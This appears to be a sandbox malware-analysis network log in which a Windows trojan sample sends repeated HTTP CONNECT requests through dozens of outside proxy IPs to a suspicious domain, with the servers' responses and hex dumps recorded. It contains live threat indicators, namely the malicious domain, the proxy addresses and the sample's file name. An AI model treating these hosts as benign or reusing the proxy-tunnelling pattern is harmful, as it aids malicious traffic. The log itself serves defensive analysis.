                                                                                Feb 23, 2024 14:28:40.246792078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.882361889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.491910934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.679539919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.789165974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.991966963 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:49.194942951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1741192.168.2.854702103.131.18.17280805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.247085094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.460474014 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1742192.168.2.855049172.245.16.47156735828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.247952938 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1743192.168.2.854985106.105.218.244805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.247952938 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1744192.168.2.854074177.53.221.89441965828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.247957945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1745192.168.2.85503352.172.1.18631285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.248586893 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:53.912585974 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1746192.168.2.854315183.78.143.142281345828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.250176907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.382477999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.382993937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:52.382584095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:56.517281055 CET39INHTTP/1.0 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1747192.168.2.855031103.121.90.21665465828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.267693996 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.991918087 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.991988897 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.992263079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:47.882414103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:51.679120064 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:55.491689920 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:03.069891930 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1748192.168.2.85500960.205.132.71805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.268399954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.626626968 CET172INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.4.4</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1749192.168.2.85499949.228.131.16950005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.268491983 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1750192.168.2.854794107.148.103.231583945828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.268493891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.382757902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.382882118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1751192.168.2.855034103.228.246.13060605828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.269224882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.991918087 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.065084934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.164856911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.608724117 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1752192.168.2.854850203.96.177.211415245828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.339168072 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.398348093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.492206097 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1753192.168.2.855051142.54.237.3441455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.340409040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1754192.168.2.855000188.166.197.12931285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.342598915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1755192.168.2.854837103.95.98.3610885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.343688011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1756192.168.2.85504559.125.232.28805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.352482080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1757192.168.2.854859178.128.82.10527065828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.413214922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.695137024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.694967031 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:53.397983074 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:08.694699049 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:23.991612911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1758192.168.2.851609141.94.174.6252145828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.429935932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1759192.168.2.85506079.110.197.14480815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.448338985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1760192.168.2.85506331.43.33.5541535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.472642899 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1761192.168.2.855079172.245.16.47156735828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.473839998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1762192.168.2.854332160.16.105.14580805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.496079922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.849905968 CET648INHTTP/1.1 400 Proxy Error
                                                                                Date: Fri, 23 Feb 2024 13:28:40 GMT
                                                                                Content-Length: 498
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 20 3c 65 6d 3e 3c 61 20 68 72 65 66 3d 22 2f 22 3e 43 4f 4e 4e 45 43 54 26 6e 62 73 70 3b 2f 3c 2f 61 3e 3c 2f 65 6d 3e 2e 3c 70 3e 0a 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 55 52 49 20 63 61 6e 6e 6f 74 20 62 65 20 70 61 72 73 65 64 3a 20 77 73 3a 2f 2f 31 30 34 2e 31 39 38 2e 31 31 33 2e 31 36 37 3a 38 30 2f 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Proxy Error</title></head><body><h1>Proxy Error</h1><p>Your browser sent a request that this server could not understand.<br />The proxy server could not handle the request <em><a href="/">CONNECT&nbsp;/</a></em>.<p>Reason: <strong>URI cannot be parsed: ws://104.198.113.167:80/</strong></p></p><hr><address>Apache/2.2.15 (CentOS) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1763192.168.2.855050103.213.97.74805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.496493101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.875075102 CET334INHTTP/1.1 400 Bad Request
                                                                                Date: Fri, 23 Feb 2024 13:28:40 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 204
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>tengine</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1764192.168.2.85505336.64.238.8210805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.564527988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1765192.168.2.85519543.157.47.2024435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.572925091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1766192.168.2.85520143.157.47.2024435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.573811054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1767192.168.2.85520343.157.47.2024435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.575980902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1768192.168.2.85520543.157.47.2024435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.577558041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1769192.168.2.855117104.16.207.86805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.597661018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.686130047 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:40 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1770192.168.2.855156172.67.181.20805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.621397018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.711091995 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:40 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1771192.168.2.851772185.139.56.13369615828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:40.626405954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
